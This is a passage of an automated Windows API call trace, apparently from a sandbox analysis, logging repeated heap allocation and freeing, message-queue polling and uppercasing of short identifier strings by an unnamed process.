lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0248.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.251] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0248.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0248.252] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0248.252] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0248.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.253] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0248.254] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.254] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0248.254] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0248.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0248.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0248.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.255] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.256] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0248.256] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.256] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0248.256] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0248.256] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0248.257] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0248.257] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0248.257] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0248.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.258] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0248.259] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0248.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0248.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.260] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0248.260] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0248.261] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0248.261] RtlAllocateHeap (HeapHandle=0x25c0000, 